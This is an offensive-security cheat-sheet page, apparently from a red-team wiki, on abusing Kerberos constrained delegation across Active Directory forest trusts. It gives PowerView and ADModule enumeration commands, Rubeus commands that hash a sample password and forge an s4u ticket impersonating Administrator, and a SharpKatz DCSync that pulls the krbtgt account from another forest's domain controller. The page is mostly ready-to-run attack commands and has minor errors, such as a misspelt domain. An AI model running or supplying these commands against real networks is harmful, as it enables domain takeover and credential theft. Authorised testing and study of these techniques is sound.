constrained-delegation

The classic Constrained Delegation does not work across forest trusts. But we can abuse it once we have a beachhead/foothold across forest trust.

Powershell

PowerView

Get-DomainUser –TrustedToAuth -Domain <target>
Get-DomainComputer –TrustedToAuth -Domain <target>

ADModule

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo -Server <target>

Binaries

[!INFO] Remember to follow the Binaries methodology

Rubeus

We can request an alternate ticket using Rubeus

C:\AD\Tools\Rubeus.exe hash /password:Qwerty@2019 /user:storagesvc /domain:eu.local

Get creds for compromised user and request ldap altservice

note that use of AES256 may not work across forests as it depends on whether or not AES encryption is supported

C:\AD\Tools\Rubeus.exe s4u /user:<owned_user> /rc4:<ntlm_owned_user> /impersonateuser:Administrator /domain:eu.local /msdsspn:cifs/some_machine.other_forest.local /altservice:ldap /domain:other_forest.local /dc:some-dc.other_forest.locall /ptt

DCSync

./SharpKatz.exe --Command dcsync --user other_forest\krbtgt --Domain other_forest.local --DomainController some-dc.other_forest.local

PreviousCross forest attacks Nextkerberoast

Last updated 1 month ago